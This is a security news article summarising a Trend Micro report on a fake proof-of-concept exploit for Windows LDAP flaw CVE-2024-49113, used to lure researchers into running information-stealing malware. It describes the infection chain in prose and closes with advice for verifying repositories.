Security researchers have been put on high alert after threat actors developed a fake proof-of-concept (PoC) exploit for a critical Microsoft vulnerability in an attempt to distribute information-stealing malware, according to a report by Trend Micro.
The vulnerability in question is related to Microsoft’s Windows Lightweight Directory Access Protocol (LDAP), for which a patch was released in December 2024 as part of the tech giant’s Patch Tuesday update. Known as CVE-2024-49113, the vulnerability allows for a denial-of-service (DoS) attack that can disrupt the LDAP service, causing service outages.
In a crafty move, the attackers created a deceptive repository housing the fake PoC exploit. When security researchers unknowingly download and execute this exploit, it triggers the exfiltration of sensitive computer and network information. This stolen data includes details such as computer information, process list, directory lists, network IPs, network adapters, and installed updates.
PoC exploits are commonly used in the cybersecurity research community to uncover software vulnerabilities and potential threats, enabling proactive measures to be taken to mitigate these risks. Despite the familiar tactic of using PoC lures as a means of malware distribution, Trend Micro emphasized the severity of this particular attack due to its exploitation of a trending issue that could impact a large number of victims.
The modus operandi of the PoC lure involves the placement of a malicious repository that mimics the original creator, serving as a gateway to the malware. By replacing the legitimate Python files with an executable poc.exe that is packed with UPX, the attackers can effectively execute malicious actions. Upon running the file, a PowerShell script is dropped and activated in the %Temp% folder, creating a Scheduled Job to run an encoded script.
Once decoded, the script fetches another script from Pastebin, which retrieves the victim’s public IP address and uploads it using a file transfer protocol. Subsequently, valuable computer and network data is collected, compressed into a ZIP file, and sent to an external FTP server using hardcoded credentials.
To combat such deceptive tactics, security researchers are advised to exercise caution and adopt best practices. Trend Micro outlined several key recommendations for researchers to follow, including downloading code from official and trusted sources, scrutinizing repositories for suspicious content, verifying the repository owner’s identity, monitoring commit histories for anomalies, and being wary of repositories with minimal activity or engagement.
By remaining vigilant and adhering to these guidelines, security researchers can better protect themselves against the dangers posed by fake PoC lures and mitigate the risk of falling victim to malicious attacks.